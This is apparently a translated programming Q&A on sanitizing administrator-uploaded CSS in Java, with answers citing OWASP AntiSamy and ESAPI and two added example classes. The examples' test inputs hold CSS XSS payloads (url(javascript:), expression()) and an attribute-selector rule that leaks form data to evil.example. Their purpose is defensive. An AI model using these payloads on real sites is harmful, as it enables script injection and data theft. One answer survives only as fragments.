Sanitize CSS with Java

Is there a good library in Java for sanitizing CSS stylesheets? We would like to let administrators upload CSS stylesheets to control the look of the part of the site they administer. Naturally, we do not want to allow XSS attacks such as background: url(javascript:), so we are looking for a good sanitization solution.

The only thing I have found so far that I liked is using Google Caja's CssTree parser to strip dangerous tags from the CSS. I may end up using something like that, but if someone knows of a library that does not pull in so many dependencies, that would be useful.

I used the AntiSamy library, as Vineet Reynolds suggested:

        import java.util.Locale;
        import java.util.ResourceBundle;
        import org.owasp.validator.css.CssScanner;
        import org.owasp.validator.html.CleanResults;
        import org.owasp.validator.html.Policy;

        Policy policy = Policy.getInstance("antisamy.xml");
        ResourceBundle messages = ResourceBundle.getBundle("AntiSamy", Locale.getDefault());
        CssScanner scanner = new CssScanner(policy, messages);
        CleanResults results = scanner.scanStyleSheet(stylesheet, Integer.MAX_VALUE);
        String cleanCss = results.getCleanHTML();   // the sanitized stylesheet text
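As an added illustration of what a sanitizer for the scenario in the question has to reject, here is a hypothetical allowlist-based Java class. It is example code written for this page, not AntiSamy, Caja, or anything from the original post; the class name, the property and function allowlists, and the sample stylesheet in main are all constructed for the example.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;
import java.util.Set;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * Hypothetical allowlist CSS sanitizer (illustrative only, not AntiSamy or Caja).
 * A rule survives only if its selector, property and value all pass an allowlist;
 * everything else, including every at-rule, is dropped.
 */
public class CssAllowlistSanitizer {

    // Properties an administrator may set (constructed list; extend as needed).
    private static final Set<String> ALLOWED_PROPERTIES = Set.of(
            "color", "background-color", "background-image", "font-family", "font-size",
            "font-weight", "margin", "padding", "border", "width", "height", "text-align");

    // Functions that may appear in a value; url() arguments are checked separately.
    private static final Set<String> ALLOWED_FUNCTIONS = Set.of("url", "rgb", "rgba");

    // No '[' or ']', so attribute selectors (usable for CSS-based data exfiltration) are
    // rejected; no '(' so functional pseudo-classes are rejected as well.
    private static final Pattern SAFE_SELECTOR = Pattern.compile("^[A-Za-z0-9 .#>,*:_-]+$");

    // No backslash, so CSS escapes such as \6a avascript: cannot hide a scheme; no '<' or
    // '>', so the output can never close a <style> element if it is inlined into HTML.
    private static final Pattern SAFE_VALUE = Pattern.compile("^[A-Za-z0-9 ,.#%/:'\"()_-]*$");

    private static final Pattern FUNCTION_CALL = Pattern.compile("([A-Za-z-]+)\\s*\\(");
    private static final Pattern URL_CALL =
            Pattern.compile("url\\s*\\(\\s*['\"]?([^'\")]*)['\"]?\\s*\\)", Pattern.CASE_INSENSITIVE);
    private static final Pattern COMMENT = Pattern.compile("/\\*.*?\\*/", Pattern.DOTALL);

    public static String sanitize(String css) {
        // Strip comments first so that url(java/**/script:) is seen in its collapsed form.
        String s = COMMENT.matcher(css).replaceAll("");
        StringBuilder out = new StringBuilder();
        int pos = 0;
        while (true) {
            int open = s.indexOf('{', pos);
            if (open < 0) break;
            int close = s.indexOf('}', open);
            if (close < 0) break;
            // Text before the last ';' is a block-less statement such as @import; drop it.
            String head = s.substring(pos, open);
            String selector = head.substring(head.lastIndexOf(';') + 1).trim();
            String body = s.substring(open + 1, close);
            pos = close + 1;
            // @media, @font-face etc. are rejected wholesale (nested blocks are not parsed).
            if (selector.isEmpty() || selector.startsWith("@")
                    || !SAFE_SELECTOR.matcher(selector).matches()) {
                continue;
            }
            List<String> kept = new ArrayList<>();
            for (String decl : body.split(";")) {
                int colon = decl.indexOf(':');
                if (colon < 0) continue;
                String prop = decl.substring(0, colon).trim().toLowerCase(Locale.ROOT);
                String value = decl.substring(colon + 1).trim();
                // Unknown properties (behavior, -moz-binding, shorthand background...) are dropped here.
                if (ALLOWED_PROPERTIES.contains(prop) && isSafeValue(value)) {
                    kept.add(prop + ": " + value);
                }
            }
            if (!kept.isEmpty()) {
                out.append(selector).append(" { ").append(String.join("; ", kept)).append("; }\n");
            }
        }
        return out.toString();
    }

    static boolean isSafeValue(String value) {
        if (!SAFE_VALUE.matcher(value).matches()) return false;
        // Every "name(" must be an allowed function: this rejects expression(), attr() and
        // the nested alert( in url(javascript:alert(1)).
        Matcher fn = FUNCTION_CALL.matcher(value);
        while (fn.find()) {
            if (!ALLOWED_FUNCTIONS.contains(fn.group(1).toLowerCase(Locale.ROOT))) return false;
        }
        // Every url() must point at https or a same-origin absolute path, which rejects
        // javascript:, data:, vbscript:, http: and protocol-relative //host targets.
        Matcher url = URL_CALL.matcher(value);
        while (url.find()) {
            String target = url.group(1).trim().toLowerCase(Locale.ROOT);
            boolean https = target.startsWith("https://");
            boolean sameOriginPath = target.startsWith("/") && !target.startsWith("//");
            if (!https && !sameOriginPath) return false;
        }
        return true;
    }

    public static void main(String[] args) {
        // Constructed sample input mixing legitimate rules with classic CSS attack vectors.
        String tainted = String.join("\n",
                "@import url(https://evil.example/steal.css);",
                "body { color: #333; background-image: url(javascript:alert(1)); }",
                "h1 { font-size: 2em; width: expression(alert(1)); }",
                "a { background-image: url(/img/bg.png); behavior: url(x.htc); }",
                "input[value^=\"a\"] { background-image: url(https://evil.example/a); }",
                "p { color: red; font-family: \\6a avascript; }");
        System.out.print(sanitize(tainted));
    }
}
```

Running main keeps only body { color: #333; }, h1 { font-size: 2em; }, a { background-image: url(/img/bg.png); } and p { color: red; }. The design is deliberately strict rather than complete: it drops @media and @font-face blocks, mis-splits values that contain a quoted ';', and rejects attribute selectors on purpose, because selectors such as input[value^="a"] combined with url() let an uploaded stylesheet leak form contents to a remote host. A regex-level tokenizer like this is a useful illustration of the checks involved, but for production use a real CSS parser (AntiSamy's Batik-based scanner or Caja's CssTree) is still the better basis.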
4 answers

OWASP AntiSamy can sanitize CSS style sheets; however, I have not tried this feature. Also, I'm not sure whether this fits your concern about a project with too many dependencies. It uses Apache Batik internally for stylesheet parsing.

Where security is concerned, I would not worry about downstream dependencies; I would choose the right tool for the job.


(Answer text garbled in extraction; only the fragments "Java StyleSheet CSS" survive.)


XSS is on the OWASP Top Ten list, and OWASP ESAPI addresses XSS. ESAPI has implementations for Java, .NET, PHP, Classic ASP, Cold Fusion, Python and Haskell. Among other things, it provides these encoders:

encodeForHTML
encodeForHTMLAttribute
encodeForJavaScript
encodeForCSS
encodeForURL

It also provides input validation, for example:

boolean isValidURL = ESAPI.validator().isValidInput("URLContext", userURL, "URL", 255, false);

Some organizations using ESAPI include American Express, Apache Foundation, Booz Allen Hamilton, Aspect Security, Foundstone (McAfee), Hartford, Infinite Campus, Lockheed Martin, MITRE, US Navy - SPAWAR, World Bank, SANS Institute.

I also recommend reading their XSS Prevention Cheat Sheet, which describes best practices for building your protection against XSS (in essence, it comes down to the fact that you MUST use the escaping syntax for the part of the HTML document into which you are placing untrusted data).

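To show the difference between encoding a single untrusted value into a CSS context (what the ESAPI encoders above do) and sanitizing a whole uploaded stylesheet (what the question asks for), here is an added example. It is not part of the original answer and not ESAPI's own code; it assumes ESAPI 2.x with its default ESAPI.properties and validation.properties on the classpath, and the class name, method names and the "adminBackground" context label are assumptions made for the example.

```java
import org.owasp.esapi.ESAPI;
import org.owasp.esapi.errors.ValidationException;

/**
 * Hypothetical helper for placing one admin-supplied value into a CSS template
 * (example only; assumes ESAPI 2.x and its default property files on the classpath).
 */
public class CssContextEncoder {

    /** Untrusted value used as a colour: output encoding alone is sufficient here. */
    public static String colorRule(String untrustedColor) {
        // encodeForCSS turns every non-alphanumeric character into a \HH escape, so the
        // value cannot terminate the declaration, the block, or an enclosing <style> element.
        return "body { color: " + ESAPI.encoder().encodeForCSS(untrustedColor) + "; }";
    }

    /**
     * Untrusted value used inside url(): encoding is NOT enough. Browsers decode CSS
     * escapes before interpreting the scheme, so an encoded "javascript:" is still
     * executed; the URL must be validated and its scheme allowlisted first.
     */
    public static String backgroundRule(String untrustedUrl) throws ValidationException {
        // "URL" is the validator type from ESAPI's default validation.properties.
        String url = ESAPI.validator().getValidInput("adminBackground", untrustedUrl, "URL", 2048, false);
        if (!url.startsWith("https://")) {
            throw new ValidationException("Background URL must use https",
                    "rejected non-https scheme in admin background URL");
        }
        return "body { background-image: url(\"" + ESAPI.encoder().encodeForCSS(url) + "\"); }";
    }

    public static void main(String[] args) throws ValidationException {
        // Constructed inputs: a benign colour, a breakout attempt, and a javascript: URL.
        System.out.println(colorRule("#336699"));
        System.out.println(colorRule("red; } body { background-image: url(javascript:alert(1)) } p {"));
        try {
            System.out.println(backgroundRule("javascript:alert(1)"));
        } catch (ValidationException e) {
            System.out.println("rejected: " + e.getUserMessage());
        }
        System.out.println(backgroundRule("https://cdn.example/bg.png"));
    }
}
```

The second colorRule call produces a single harmless declaration because the braces, semicolons and parentheses are all escaped; the javascript: URL is rejected by the validator before any encoding happens. This is the property the cheat sheet warns about: some CSS positions, url() and property names that could start with expression among them, can never safely hold untrusted data on the strength of encoding alone, which is why an entire uploaded stylesheet needs an allowlisting sanitizer such as AntiSamy's CSS scanner rather than an encoder.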
